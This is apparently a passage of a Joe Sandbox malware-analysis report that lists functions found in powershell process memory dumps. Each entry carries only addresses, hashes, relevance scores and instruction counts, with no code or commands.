                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b2cf23808767ae53d54bfb31e2bcad52114f016853998ef564ddd76cd41023e4
                                                                                                                                  • Instruction ID: 64bd346d4cf2e4b63e5240be30371ec9a349ecaab647753af4abc298b91c3137
                                                                                                                                  • Opcode Fuzzy Hash: b2cf23808767ae53d54bfb31e2bcad52114f016853998ef564ddd76cd41023e4
                                                                                                                                  • Instruction Fuzzy Hash: 08318D753002019FC705EB79E854AAAB7A6FFC8315F04853AE10ACB365DF7099498BA1
                                                                                                                                  Function 03177285 Relevance: .1, Instructions: 91COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: bb308f5878afb03e4824de027eb633cbdbf3fba00e9dd74f5f8b2ddea8c3abfb
                                                                                                                                  • Instruction ID: ac027def2edb18169d0c59acc28f20eebc74a5f07552192ebfa694f4d027d197
                                                                                                                                  • Opcode Fuzzy Hash: bb308f5878afb03e4824de027eb633cbdbf3fba00e9dd74f5f8b2ddea8c3abfb
                                                                                                                                  • Instruction Fuzzy Hash: 7031F734B042058FCB14DB68C598ABEBBF6AF8D315F1940A8E846EB395DB35DD01CB60
                                                                                                                                  Function 0317B120 Relevance: .1, Instructions: 91COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0c2c16c2fc13f89a2114cbe0bce4ef5fc33a54e861d61fc6380b5567a5362261
                                                                                                                                  • Instruction ID: e16c5494478e2ac1c5f1be05cf50d55c36857cba854ab00fd5e0c58772ecfe1d
                                                                                                                                  • Opcode Fuzzy Hash: 0c2c16c2fc13f89a2114cbe0bce4ef5fc33a54e861d61fc6380b5567a5362261
                                                                                                                                  • Instruction Fuzzy Hash: 92315074A012099FDB04DFBDD5587AEBBF6AF8D310F188069E405EB355EB349C458B60
                                                                                                                                  Function 0317AFE8 Relevance: .1, Instructions: 85COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 37caa4198d2256694b0fa2fc68959460a7ced9f2a81433bb2ee168d54f6eda57
                                                                                                                                  • Instruction ID: 307375df408eb124f146d3141aa117de0ac1e10d95f0cb908e57de7b4759d270
                                                                                                                                  • Opcode Fuzzy Hash: 37caa4198d2256694b0fa2fc68959460a7ced9f2a81433bb2ee168d54f6eda57
                                                                                                                                  • Instruction Fuzzy Hash: EB31B7B4E002059FDB04EBB4D855AEEBBB2EF89300F1584A9D515AF391DB399D41CF50
                                                                                                                                  Function 0317B130 Relevance: .1, Instructions: 84COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2481a366a6dc06c5896dfd8c1621a5885a061da04e0a37fb7c9087dcc80f3fd6
                                                                                                                                  • Instruction ID: 7af3b7b5d9ba633ccbe3790e852c161fbd9777a07991c537134b666c05228a5f
                                                                                                                                  • Opcode Fuzzy Hash: 2481a366a6dc06c5896dfd8c1621a5885a061da04e0a37fb7c9087dcc80f3fd6
                                                                                                                                  • Instruction Fuzzy Hash: 6A313074A002099FDB04DFADD5987AEBAFAEF8D310F188069E405EB354EB349C458B61
                                                                                                                                  Function 07533074 Relevance: .1, Instructions: 84COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3195673054.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_7530000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 20503c4374bba67560910e4518a8943db07e0ae16e188bb94ff6fd18f1a268ae
                                                                                                                                  • Instruction ID: 810a32adc5b0f351284b23bfc9453e7a9b0279a9ce406d3a83344dcf6da7e2fd
                                                                                                                                  • Opcode Fuzzy Hash: 20503c4374bba67560910e4518a8943db07e0ae16e188bb94ff6fd18f1a268ae
                                                                                                                                  • Instruction Fuzzy Hash: 3A31D0B5A14206DFDB20CF59D842BE5BBE0BF45261F0885A7E8088F272C775D984CBE1
                                                                                                                                  Function 0317E310 Relevance: .1, Instructions: 83COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0fd4e9028e82f8974124771a24028061a81ec939ec5c3b43be4eefb216b02006
                                                                                                                                  • Instruction ID: 028d3b33b44f0adf9d5eb644337c244405595bf156633db2176339ce4ddde8ec
                                                                                                                                  • Opcode Fuzzy Hash: 0fd4e9028e82f8974124771a24028061a81ec939ec5c3b43be4eefb216b02006
                                                                                                                                  • Instruction Fuzzy Hash: F4311A74A01204CFCB14DB68D458AAEBBF2AF8D314F19856DD406EB361DB749845CB61
                                                                                                                                  Function 0317E320 Relevance: .1, Instructions: 77COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 67ec63b2a8a3357c382380880fb67875448cd5121b0b67fb7edc9672a2c9204f
                                                                                                                                  • Instruction ID: 40460153625ff9c7101e2e88004409dc04d97e7f38e4c2c8a22ddacdf57a047b
                                                                                                                                  • Opcode Fuzzy Hash: 67ec63b2a8a3357c382380880fb67875448cd5121b0b67fb7edc9672a2c9204f
                                                                                                                                  • Instruction Fuzzy Hash: B6312974B00204CFCB14EF69D458AAEBBF6EF8D214F148569E406E7361DB34AC45CBA0
                                                                                                                                  Function 0317AFF8 Relevance: .1, Instructions: 77COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: aef9cd2fc50c34803db117c45631032a25c3754b49ae150c130c352eaa157e31
                                                                                                                                  • Instruction ID: 22138e4b650a2390b17579b9c4790f8686aa0c215cd187ac26cf63ea36c40195
                                                                                                                                  • Opcode Fuzzy Hash: aef9cd2fc50c34803db117c45631032a25c3754b49ae150c130c352eaa157e31
                                                                                                                                  • Instruction Fuzzy Hash: 193175B4E001099FDB04EFA4D855BBEB7B2EF89300F118469E615AB395DF399D418F90
                                                                                                                                  Function 00FAF4E0 Relevance: .1, Instructions: 76COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190485234.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_fad000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6ba4f00f64f75f0d08ee3069a13fdd847e90b73bfc14995ef17d7f07b96cc7df
                                                                                                                                  • Instruction ID: 4849e126f6b805609c8895ed99dd8478fa4dc06caad48202fa610f2643a663cc
                                                                                                                                  • Opcode Fuzzy Hash: 6ba4f00f64f75f0d08ee3069a13fdd847e90b73bfc14995ef17d7f07b96cc7df
                                                                                                                                  • Instruction Fuzzy Hash: 8421E2B6900200DFCB05DF94D9C4B16BFA5EB89314F28C5B9E9094F256C336D85AEBA1
                                                                                                                                  Function 031796B0 Relevance: .1, Instructions: 76COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f158c5a35d2c757f353298e44898a72a0add1749639670645e106f028d72d715
                                                                                                                                  • Instruction ID: c29faeece8af41ec27db3dfcc249d0ea333bc163990ea58f964001fe437653c1
                                                                                                                                  • Opcode Fuzzy Hash: f158c5a35d2c757f353298e44898a72a0add1749639670645e106f028d72d715
                                                                                                                                  • Instruction Fuzzy Hash: 8D3166749057849FDB64CF6AD0887CAFBF2EB89324F28C06ED449AA216C7745489CF51
                                                                                                                                  Function 00FAF134 Relevance: .1, Instructions: 72COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190485234.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_fad000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ff6d26f02a7dcb85d2a57e754506e820188c2bf27ddf2dc628f707652a72dd31
                                                                                                                                  • Instruction ID: 5c8f542f9510ee9d254848cb8988db0a42ba7faa2947ab7a9311c673d456b60e
                                                                                                                                  • Opcode Fuzzy Hash: ff6d26f02a7dcb85d2a57e754506e820188c2bf27ddf2dc628f707652a72dd31
                                                                                                                                  • Instruction Fuzzy Hash: 9F2104B6A04204EFCB04DF94C9C0B26BBA5FB89324F24C57DD8094F255C73AD84ADB61
                                                                                                                                  Function 0317C170 Relevance: .1, Instructions: 69COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8c8669ac127dc2450e0709f3a73ad6d812c876bc3fd4070009864fc4b4cfac4b
                                                                                                                                  • Instruction ID: 6cf01fe75e8b7bf4c6dc85e54b3690ef4ecc83d2a6f2af55c8820d3ed0782d07
                                                                                                                                  • Opcode Fuzzy Hash: 8c8669ac127dc2450e0709f3a73ad6d812c876bc3fd4070009864fc4b4cfac4b
                                                                                                                                  • Instruction Fuzzy Hash: 6D1108353093A01FC7118B7998509BA7FF9DF8A21071941EFE444CF263C661CC45C750
                                                                                                                                  Function 031796C0 Relevance: .1, Instructions: 69COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e17f9e70c3b72e8e7d729690b8cbda22a293a664f2bbbf40c2c37e8fa8ec4b33
                                                                                                                                  • Instruction ID: 9f08520d558bafaa4f57649d1808e8c521be6a3256396890e84c210385f63444
                                                                                                                                  • Opcode Fuzzy Hash: e17f9e70c3b72e8e7d729690b8cbda22a293a664f2bbbf40c2c37e8fa8ec4b33
                                                                                                                                  • Instruction Fuzzy Hash: 792168B49017448FDB64CF6AC0887CAFBF6EB88320F28C05ED85DAB215C77464898F60
                                                                                                                                  Function 03176A29 Relevance: .1, Instructions: 67COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b9401baca54f97866e13c7cb723f870f5729c6a3d97bc739e9ea979088417c3d
                                                                                                                                  • Instruction ID: 4a7f7452e6eeab4b307296cc455c12ab56e7e286e9bbab6620b2140d69d5b606
                                                                                                                                  • Opcode Fuzzy Hash: b9401baca54f97866e13c7cb723f870f5729c6a3d97bc739e9ea979088417c3d
                                                                                                                                  • Instruction Fuzzy Hash: 1E21E634B001058FDB04DF64C598ABDBBF5AF8D615F1944A8E802AB2A5DB34DD41CB60
                                                                                                                                  Function 03177924 Relevance: .1, Instructions: 62COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b7cc959de81973e8260d5dcd28eb1ec0b4228adba3b1220fdb0ad31367d3e8db
                                                                                                                                  • Instruction ID: 8d767efe52b30d71d8c4139ab7908326a5f9fe33e5e6a2807c83e4d58e9236c1
                                                                                                                                  • Opcode Fuzzy Hash: b7cc959de81973e8260d5dcd28eb1ec0b4228adba3b1220fdb0ad31367d3e8db
                                                                                                                                  • Instruction Fuzzy Hash: E6112B357402188FCB04DBA8D9409AEB7F6EBCD321F0940A9E509EB365DB35DD158B91
                                                                                                                                  Function 00FAF4DB Relevance: .1, Instructions: 57COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190485234.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_fad000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                                                                                                                  • Instruction ID: 66cfcc7f7fe14a0b71ed83a6021e0b272872c5c7ba4d9980d0e2f2886438028a
                                                                                                                                  • Opcode Fuzzy Hash: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                                                                                                                  • Instruction Fuzzy Hash: 8B218CB6904240DFCF06CF50D9C4B16BF62FB59324F28C5A9D9094E256C33AD86ADF91
                                                                                                                                  Function 0317E5E0 Relevance: .1, Instructions: 56COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fcd0fa32a89df4a3f419dc24f307db3f7b2d840618b67374395399f91c9cff50
                                                                                                                                  • Instruction ID: 32e6fbdda8ec96433218966282d8a91b5446e3c5e80b29284996da97f2e76fba
                                                                                                                                  • Opcode Fuzzy Hash: fcd0fa32a89df4a3f419dc24f307db3f7b2d840618b67374395399f91c9cff50
                                                                                                                                  • Instruction Fuzzy Hash: 00119AB19053858FDB21CF69C544B9AFFF4AF49320F2880AED448A7251D3399548CFA5
                                                                                                                                  Function 00FAF12F Relevance: .1, Instructions: 53COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190485234.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_fad000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e9867b41209b1ae96989907f61c5f808f60e730aab7477091df5884716147213
                                                                                                                                  • Instruction ID: a04c4b20996a1613c0517fad3996b24f8ed00b289d78b319b80f6c678f93d1f5
                                                                                                                                  • Opcode Fuzzy Hash: e9867b41209b1ae96989907f61c5f808f60e730aab7477091df5884716147213
                                                                                                                                  • Instruction Fuzzy Hash: 1711BBB6904284CFCB05CF50C5C4B15BFA1FB85328F28C6AAD8494F656C33AD84ADB61
                                                                                                                                  Function 0317E5F0 Relevance: .1, Instructions: 51COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d11a6c0e875fe201d5db2f0f62da783bf3c6a3f5632ee31e5562fc3c80a1a839
                                                                                                                                  • Instruction ID: 9df42cdfa1d9a61a986c096d763dbf0a93986d5812584159439e2ca60e7f00fc
                                                                                                                                  • Opcode Fuzzy Hash: d11a6c0e875fe201d5db2f0f62da783bf3c6a3f5632ee31e5562fc3c80a1a839
                                                                                                                                  • Instruction Fuzzy Hash: CD114CB19003498FDB20CF59C504BDEFBF4EB48314F2884A9E558A7251D739E644CFA5
                                                                                                                                  Function 0317C238 Relevance: .0, Instructions: 48COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 48a0dd9f6f61a2d5d4439c99c65b06c2829b9cd5e3e0b6feb2ae49e98f894e1b
                                                                                                                                  • Instruction ID: c8907296dd5f4b6cc82506f0548b5e19d31cb8fc7c39fae8ccb875e0784969b8
                                                                                                                                  • Opcode Fuzzy Hash: 48a0dd9f6f61a2d5d4439c99c65b06c2829b9cd5e3e0b6feb2ae49e98f894e1b
                                                                                                                                  • Instruction Fuzzy Hash: 8201243270E2D18FD7058B6DA8946B6BFF4EFAA211B0D00EEE491CB262C765C908D750
                                                                                                                                  Function 0317E298 Relevance: .0, Instructions: 48COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9a8f56c23fea67ac8bfe522444085b67d773b69be708f03d8de2369ca6eb36b4
                                                                                                                                  • Instruction ID: 0febd39cea41f45b9514304c4b5dd3d636957e4df8df5b126ee27d90756a6c5e
                                                                                                                                  • Opcode Fuzzy Hash: 9a8f56c23fea67ac8bfe522444085b67d773b69be708f03d8de2369ca6eb36b4
                                                                                                                                  • Instruction Fuzzy Hash: 1B111B35204750DFC728DF79D08585AB7F6EF8921532489ADD48A8B7A0CB36F842CF50
                                                                                                                                  Function 0317E160 Relevance: .0, Instructions: 48COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c7f3990894b5124734cfa2d751a4e99f12808deda06ffebb05d013851b812792
                                                                                                                                  • Instruction ID: 38b311ab6fd1aa7609639c7a24599b82d74dac1958af31bc8a8f931b7b61e3d1
                                                                                                                                  • Opcode Fuzzy Hash: c7f3990894b5124734cfa2d751a4e99f12808deda06ffebb05d013851b812792
                                                                                                                                  • Instruction Fuzzy Hash: 0D018035B00214DFCB119BB5E808AAEBBF5FB88215F00016EE51E93342DB315905DB90
                                                                                                                                  Function 0317C1D8 Relevance: .0, Instructions: 47COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 380e244f522fb683d55f2dd9111635ef21eaf2a6f354d39810898c17b280e13b
                                                                                                                                  • Instruction ID: a8785bcff678a31401dfaf8ba6eb5b8e04d3f5c0e8920ac51b447f61494f8f6a
                                                                                                                                  • Opcode Fuzzy Hash: 380e244f522fb683d55f2dd9111635ef21eaf2a6f354d39810898c17b280e13b
                                                                                                                                  • Instruction Fuzzy Hash: C401F43630A2A01FC7118A79AC449BBBFF9DF8A22071941AEF484CB253C660CC05C760
                                                                                                                                  Function 00FAD01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190485234.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_fad000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b76dc888c8e33ed2078323889a20786e9d0d08987ca1ab7bc925886e0f8ede53
                                                                                                                                  • Instruction ID: 9c7ec7e7884b897e2079e5eda383990d97380bbb65469c1d3fb3c5a27643c5ef
                                                                                                                                  • Opcode Fuzzy Hash: b76dc888c8e33ed2078323889a20786e9d0d08987ca1ab7bc925886e0f8ede53
                                                                                                                                  • Instruction Fuzzy Hash: AE012BB14083409EE7108E25CDC4767BFD8EF52334F18C42AEC4A0B64AC279D841D6B1
                                                                                                                                  Function 00FAD005 Relevance: .0, Instructions: 45COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190485234.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_fad000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 70bb732a1c486631bc4ce2810b7ab8a1fcc06197d81dc25150818a965ff8140c
                                                                                                                                  • Instruction ID: dc817efd5045c8c1fd3e0eb578fce055b35fd03607959ab1fd280a15f7ec8482
                                                                                                                                  • Opcode Fuzzy Hash: 70bb732a1c486631bc4ce2810b7ab8a1fcc06197d81dc25150818a965ff8140c
                                                                                                                                  • Instruction Fuzzy Hash: E0014C6140E3C09ED7128B258894B56BFB4EF53224F1DC0DBD8888F2A7C2699849D772
                                                                                                                                  Function 0317F680 Relevance: .0, Instructions: 39COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 399ff5343dc92570a4251463fe860c5697611485a5a36ab6cf0087f9040720eb
                                                                                                                                  • Instruction ID: a66c6bc8bb20d86864cdc61fb6f22e78a601f2978331efc505fd6fc081aae759
                                                                                                                                  • Opcode Fuzzy Hash: 399ff5343dc92570a4251463fe860c5697611485a5a36ab6cf0087f9040720eb
                                                                                                                                  • Instruction Fuzzy Hash: CF01D371D0074AEFCB44DFE4C8446EEBBB1BF99310F24461AE015AA641EBB06696CB80
                                                                                                                                  Function 03179398 Relevance: .0, Instructions: 38COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 79740d0ec8fd13ef086ad7f740420a82f1d10773f95763a70bc2285d6e16ba1a
                                                                                                                                  • Instruction ID: 3b51ea06860afae4d5f2f7ee15bd3880fed8464bdd35d10a20b27da0ddaec190
                                                                                                                                  • Opcode Fuzzy Hash: 79740d0ec8fd13ef086ad7f740420a82f1d10773f95763a70bc2285d6e16ba1a
                                                                                                                                  • Instruction Fuzzy Hash: F4F022356486901FD716AB38D4A43EF7FA2EFC6324F1441AEC4068B386CE391806CB92
                                                                                                                                  Function 0317C1E8 Relevance: .0, Instructions: 38COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
